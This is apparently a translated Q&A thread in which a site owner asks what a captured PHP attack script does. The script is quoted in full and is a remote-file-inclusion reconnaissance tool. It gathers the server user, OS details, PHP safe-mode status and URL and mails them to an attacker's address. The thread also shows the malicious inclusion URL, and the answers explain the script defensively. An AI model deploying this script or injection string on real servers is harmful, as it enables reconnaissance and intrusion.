Скрипт деточки, заполняющий мой сайт этим фрагментом - PullRequest
0 голосов
/ 30 октября 2009

Кто-то здесь пытается залить мой сайт каким-нибудь скриптом. К счастью, мое приложение поймало его.

Я просто хочу знать, что делает этот код,

<script>
<!--
document.write(unescape("<?php
//=================================
//
// scan inb0x hotmail v3.0
//
// coded by FilhOte_Ccs and LOST
// re-c0d3d by delet
//
//
//=================================
//
ini_set("max_execution_time",-1);
set_time_limit(0);
$user = @get_current_user();
$UNAME = @php_uname();
$SafeMode = @ini_get('safe_mode');
 if ($SafeMode == '') { $SafeMode = "OFF"; }
 else { $SafeMode = " $SafeMode "; }
$delet=($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
$dados=("<b>Produto</b> = " . $UNAME . "
<i>Seguran?a</i> = " . $SafeMode . "
http://" . $delet . " 

Muito obrigado por comprar o hehe1 com: <u>delet</u>");
$email = "inbox200905@hotmail.com";
$assunto = "lup@";
$email1 = "inbox200905@hotmail.com";
$headers = "From: <$email>\r\n";
$headers = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
if(mail($email1,$assunto,$dados,$headers)){
echo "Isso, ja foi!";
exit();
}
else{
echo "N?o foi.";
exit();
}
?>
"));
//-->
</script>

Он пытался сделать что-то вроде этого: mysite/index.php?dll=http://www.forms.dgpj.mj.pt/box2.txt?.

Ответы [ 3 ]

3 голосов
/ 30 октября 2009

http://evilcodecave.blogspot.com/2009/08/rfi-malware-analysis-ascrimez-kit.html

Это скрипт уведомления, то есть используется ... для отправки уведомлений злоумышленники, чтобы найти более уязвимым серверы:)

0 голосов
/ 30 октября 2009

РЕДАКТИРОВАТЬ: Как отметил Грег Хьюгилл в комментарии, тот факт, что этот может запустить , даже если нет ничего полезного для отчета, является проблемой, которая не должна принято слегка.

Похоже, он пытается собрать статистику "$ SafeMode" для возможного использования в будущем:

...
$dados=("<b>Produto</b> = " . $UNAME . " // server/OS info
<i>Seguran?a</i> = " . $SafeMode . "     // is PHP safe mode off? on? what?
http://" . $delet . "                    // full request URI
...
$email = "inbox200905@hotmail.com";      // who is harvesting
...
if(mail($email1,$assunto,$dados,$headers)){ // harvest via. mail

Dolt не может отправить обратно пользователю, которого он посмотрел. Слабый соус.

0 голосов
/ 30 октября 2009

Похоже, этот скрипт только собирает и отправляет некоторую информацию на inbox200905@hotmail.com адрес:

  • Имя пользователя, выполняющего php-скрипты на сервере
  • Название операционной системы, которая установлена ​​на сервере
  • php безопасный режим включен
  • Также его URL и имя скрипта

Я думаю, что этот скрипт используется только для поиска серверов, которые можно использовать для атаки.

Добро пожаловать на сайт PullRequest, где вы можете задавать вопросы и получать ответы от других членов сообщества.
...